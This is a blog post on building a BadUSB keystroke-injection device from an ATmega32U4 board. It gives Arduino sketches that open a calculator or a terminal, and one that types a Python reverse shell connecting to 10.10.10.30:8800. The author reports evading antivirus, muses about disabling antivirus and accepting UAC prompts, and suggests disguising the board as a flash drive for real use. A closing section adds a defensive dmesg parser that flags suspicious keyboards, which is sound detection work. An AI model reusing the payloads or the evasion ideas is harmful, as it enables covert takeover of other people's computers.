Playing with BadUSB

Physical attack warning

Posted by Les1ie on August 6, 2019

The board is a Beetle USB (ATmega32U4).

It has a built-in USB plug and is fairly cheap. I had looked at several BadUSB boards before but gave up on all of them because of the price, until hx mentioned a couple of days ago that this board works too, so I ordered one right away.

Select "Arduino Leonardo" as the board type, then compile and upload.

Hands-on

The code is very simple; you can understand it at a glance.

Windows: pop a calculator

#include <Keyboard.h>

void setup() {
  // put your setup code here, to run once:
  Keyboard.begin();
  delay(2000);                   // wait for the host to enumerate the HID keyboard
  Keyboard.press(KEY_LEFT_GUI);  // Win+R opens the Run dialog
  delay(50);
  Keyboard.press('r');
  delay(50);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(50);
  Keyboard.println("calc");      // type "calc" followed by a newline
  delay(50);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(50);
}

void loop() {
  // put your main code here, to run repeatedly:

}

Ubuntu: open a terminal

#include <Keyboard.h>

void setup() {
  // put your setup code here, to run once:
  Keyboard.begin();
  delay(2000);                   // wait for the host to enumerate the HID keyboard
/*
  Alternative: open the terminal with the Ctrl+Alt+T shortcut
  Keyboard.press(KEY_LEFT_CTRL);
  delay(500);
  Keyboard.press(KEY_LEFT_ALT);
  delay(500);
  Keyboard.press('T');
  delay(500);
  Keyboard.release('T');
  */
  Keyboard.press(KEY_LEFT_GUI);  // the Super key opens the GNOME Activities search
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  delay(500);
  Keyboard.println("term");      // search for the terminal application
  delay(500);

  Keyboard.press(KEY_RETURN);    // launch the first search result
  delay(500);
  Keyboard.release(KEY_RETURN);


  Keyboard.println("echo hacked");  // type a command into the new terminal
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  delay(50);
}

void loop() {
  // put your main code here, to run repeatedly:

}

Ubuntu: reverse shell

#include <Keyboard.h>

void setup() {
  // put your setup code here, to run once:
  Keyboard.begin();
  delay(2000);                   // wait for the host to enumerate the HID keyboard
/*
  Alternative: open the terminal with the Ctrl+Alt+T shortcut
  Keyboard.press(KEY_LEFT_CTRL);
  delay(500);
  Keyboard.press(KEY_LEFT_ALT);
  delay(500);
  Keyboard.press('T');
  delay(500);
  Keyboard.release('T');
  */
  Keyboard.press(KEY_LEFT_GUI);  // the Super key opens the GNOME Activities search
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  delay(500);
  Keyboard.println("term");      // search for the terminal application
  delay(500);

  Keyboard.press(KEY_RETURN);    // launch the first search result
  delay(500);
  Keyboard.release(KEY_RETURN);


  // the string literal must stay on one line; println already appends the newline
  Keyboard.println("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.30\",8800));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  delay(50);
}

void loop() {
  // put your main code here, to run repeatedly:

}

The code is extremely simple and the execution is not stealthy at all; the hard part is getting the finished board plugged into the target machine :)

It is an emulated keyboard device. I tried it on 5 machines, three Windows 10 boxes with antivirus installed and two Ubuntu boxes; it ran normally on all of them and was never blocked.

Malicious commands might be blocked: Huorong seems to block a command-line command that creates a user.

Having the board emulate keystrokes to turn the antivirus off is also possible :) though I have not yet figured out how to close the antivirus with keyboard shortcuts alone. Emulating the clicks that allow the program to run or accept the UAC prompt during execution may also be possible.

On Taobao some versions of this board come with a case, so it looks like an ordinary USB flash drive. That would probably be better for real-world use.
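All three sketches above work because the board enumerates as a plain HID keyboard, so nothing the antivirus watches for ever happens: the host just sees typing. What the host does see is the enumeration itself. The kernel logs the new USB device, its idVendor/idProduct, the product string, and every interface it exposes, and a Leonardo-class board exposes a CDC serial interface next to the keyboard, which a real keyboard does not. The following Python script is an added example, not code from the original post: it parses constructed dmesg-style lines (the Leonardo's 2341:8036 is its real identifier; the Logitech and SanDisk IDs, the timestamps and the allowlist are sample values) and flags any keyboard that is not on the allowlist or that also carries a serial or storage interface.

```python
import re
from dataclasses import dataclass, field

# Constructed sample kernel log lines in dmesg format (not captured from a real host).
# Three plug-in events: an ordinary keyboard, an Arduino Leonardo acting as a
# keyboard (composite HID + CDC serial), and a plain USB flash drive.
SAMPLE_DMESG = """\
[ 1001.201] usb 1-2: new full-speed USB device number 4 using xhci_hcd
[ 1001.350] usb 1-2: New USB device found, idVendor=046d, idProduct=c31c, bcdDevice=64.00
[ 1001.351] usb 1-2: Product: USB Keyboard
[ 1001.402] hid-generic 0003:046D:C31C.0003: input,hidraw1: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-2/input0
[ 1337.001] usb 1-3: new full-speed USB device number 5 using xhci_hcd
[ 1337.150] usb 1-3: New USB device found, idVendor=2341, idProduct=8036, bcdDevice= 1.00
[ 1337.151] usb 1-3: Product: Arduino Leonardo
[ 1337.200] hid-generic 0003:2341:8036.0004: input,hidraw2: USB HID v1.01 Keyboard [Arduino LLC Arduino Leonardo] on usb-0000:00:14.0-3/input2
[ 1337.210] cdc_acm 1-3:1.0: ttyACM0: USB ACM device
[ 1400.000] usb 1-4: new high-speed USB device number 6 using xhci_hcd
[ 1400.100] usb 1-4: New USB device found, idVendor=0781, idProduct=5583, bcdDevice= 1.00
[ 1400.101] usb 1-4: Product: Ultra Fit
[ 1400.300] usb-storage 1-4:1.0: USB Mass Storage device detected
"""

# Sample allowlist of keyboards the organisation actually issued (VID, PID), uppercase hex.
KNOWN_KEYBOARDS = {("046D", "C31C")}

NEW_DEVICE = re.compile(r"usb (?P<port>\d+-[\d.]+): New USB device found, "
                        r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})")
PRODUCT = re.compile(r"usb (?P<port>\d+-[\d.]+): Product: (?P<name>.+)$")
# hid-generic reports bus:VID:PID.instance and, for keyboards, the literal word "Keyboard"
HID_KBD = re.compile(r"hid-generic 0003:(?P<vid>[0-9A-F]{4}):(?P<pid>[0-9A-F]{4})\.\w+: "
                     r".*USB HID v[\d.]+ Keyboard \[(?P<name>[^\]]+)\]")
# interface-level drivers log "bus-port:config.interface"
OTHER_IFACE = re.compile(r"(?P<drv>cdc_acm|usb-storage) (?P<port>\d+-[\d.]+):\d+\.\d+:")


@dataclass
class UsbDevice:
    vid: str
    pid: str
    product: str = ""
    keyboard_interfaces: int = 0
    other_interfaces: list = field(default_factory=list)


def parse_dmesg(text):
    """Group dmesg lines into one UsbDevice per (VID, PID)."""
    devices = {}      # (VID, PID) -> UsbDevice
    port_to_key = {}  # "bus-port" -> (VID, PID), to attach later lines to the device
    for line in text.splitlines():
        if m := NEW_DEVICE.search(line):
            key = (m["vid"].upper(), m["pid"].upper())
            devices[key] = UsbDevice(*key)
            port_to_key[m["port"]] = key
        elif (m := PRODUCT.search(line)) and m["port"] in port_to_key:
            devices[port_to_key[m["port"]]].product = m["name"].strip()
        elif m := HID_KBD.search(line):
            key = (m["vid"].upper(), m["pid"].upper())
            devices.setdefault(key, UsbDevice(*key)).keyboard_interfaces += 1
        elif (m := OTHER_IFACE.search(line)) and m["port"] in port_to_key:
            devices[port_to_key[m["port"]]].other_interfaces.append(m["drv"])
    return devices


def assess(devices, allowlist=KNOWN_KEYBOARDS):
    """Return (vid:pid, product, reasons) for every keyboard that looks suspicious."""
    findings = []
    for key, dev in devices.items():
        if dev.keyboard_interfaces == 0:
            continue  # not a keyboard, out of scope for this check
        reasons = []
        if key not in allowlist:
            reasons.append("keyboard not on allowlist")
        if dev.other_interfaces:
            reasons.append("keyboard also exposes " + ",".join(dev.other_interfaces))
        if reasons:
            findings.append((f"{key[0]}:{key[1]}", dev.product, reasons))
    return findings


if __name__ == "__main__":
    for ident, product, reasons in assess(parse_dmesg(SAMPLE_DMESG)):
        print(f"ALERT {ident} ({product}): {'; '.join(reasons)}")
```

On a real host the input would be the output of `dmesg` or the kernel journal rather than the embedded sample, and the allowlist would come from asset inventory. Correlating by VID:PID rather than by port keeps the parser short but merges two identical devices; a production version would key on the port path as well. The same two signals (unknown keyboard, keyboard with extra interfaces) are what a udev rule or a tool such as USBGuard can act on before the first keystroke arrives, which is the point where an injected payload like the ones above has to be stopped.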

Les1ie

August 7, 2019, 09:35:43